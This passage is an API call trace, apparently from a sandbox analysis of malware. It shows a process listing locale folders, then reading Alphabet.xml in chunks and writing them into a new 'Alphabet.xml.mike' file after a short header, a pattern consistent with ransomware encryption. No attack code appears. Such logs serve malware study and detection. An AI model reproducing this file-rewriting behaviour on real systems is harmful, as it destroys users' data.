ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0042.522] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0042.522] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0042.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0042.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0042.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0042.566] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0042.566] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.599] GetFileType (hFile=0x264) returned 0x1 [0042.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0042.599] GetFileType (hFile=0x264) returned 0x1 [0042.599] CloseHandle (hObject=0x264) returned 1 [0042.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.600] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0042.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0042.600] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0042.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.600] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c4cd8 | out: lpFileInformation=0x22c4cd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486)) returned 1 [0042.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.600] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c4fd4 | out: lpFileInformation=0x22c4fd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486)) returned 1 [0042.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.600] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0042.601] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0042.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.602] GetFileType (hFile=0x264) returned 0x1 [0042.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.602] GetFileType (hFile=0x264) returned 0x1 [0042.602] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0042.602] WriteFile (in: hFile=0x264, lpBuffer=0x22c5d74*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22c5d74*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0042.603] CloseHandle (hObject=0x264) returned 1 [0042.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0042.603] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c58a4 | out: lpFileInformation=0x22c58a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486)) returned 1 [0042.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0042.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.603] GetFileType (hFile=0x264) returned 0x1 [0042.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.603] GetFileType (hFile=0x264) returned 0x1 [0042.603] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0042.604] ReadFile (in: hFile=0x264, lpBuffer=0x22c6e90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22c6e90*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.618] CloseHandle (hObject=0x264) returned 1 [0042.619] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.619] GetFileType (hFile=0x264) returned 0x1 [0042.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.619] GetFileType (hFile=0x264) returned 0x1 [0042.619] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0042.620] WriteFile (in: hFile=0x264, lpBuffer=0x22d13f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x22d13f8*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.620] CloseHandle (hObject=0x264) returned 1 [0042.621] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.621] GetFileType (hFile=0x264) returned 0x1 [0042.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.621] GetFileType (hFile=0x264) returned 0x1 [0042.621] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0042.621] ReadFile (in: hFile=0x264, lpBuffer=0x22d3e38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22d3e38*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.621] CloseHandle (hObject=0x264) returned 1 [0042.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.624] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.624] GetFileType (hFile=0x264) returned 0x1 [0042.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.624] GetFileType (hFile=0x264) returned 0x1 [0042.624] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0042.624] WriteFile (in: hFile=0x264, lpBuffer=0x20ec4b8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x20ec4b8*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.625] CloseHandle (hObject=0x264) returned 1 [0042.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.626] GetFileType (hFile=0x264) returned 0x1 [0042.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.626] GetFileType (hFile=0x264) returned 0x1 [0042.626] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0042.626] ReadFile (in: hFile=0x264, lpBuffer=0x20eeef8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20eeef8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.626] CloseHandle (hObject=0x264) returned 1 [0042.627] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.627] GetFileType (hFile=0x264) returned 0x1 [0042.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.627] GetFileType (hFile=0x264) returned 0x1 [0042.627] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5220 [0042.627] WriteFile (in: hFile=0x264, lpBuffer=0x20f9460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x20f9460*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.627] CloseHandle (hObject=0x264) returned 1 [0042.628] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.628] GetFileType (hFile=0x264) returned 0x1 [0042.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.628] GetFileType (hFile=0x264) returned 0x1 [0042.628] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x7800 [0042.628] ReadFile (in: hFile=0x264, lpBuffer=0x20fbea0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20fbea0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.628] CloseHandle (hObject=0x264) returned 1 [0042.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.629] GetFileType (hFile=0x264) returned 0x1 [0042.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.629] GetFileType (hFile=0x264) returned 0x1 [0042.629] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7a20 [0042.629] WriteFile (in: hFile=0x264, lpBuffer=0x2106408*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2106408*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.630] CloseHandle (hObject=0x264) returned 1 [0042.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.631] GetFileType (hFile=0x264) returned 0x1 [0042.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.631] GetFileType (hFile=0x264) returned 0x1 [0042.631] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xa000 [0042.631] ReadFile (in: hFile=0x264, lpBuffer=0x2108e48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2108e48*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.631] CloseHandle (hObject=0x264) returned 1 [0042.632] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.632] GetFileType (hFile=0x264) returned 0x1 [0042.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.632] GetFileType (hFile=0x264) returned 0x1 [0042.632] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, 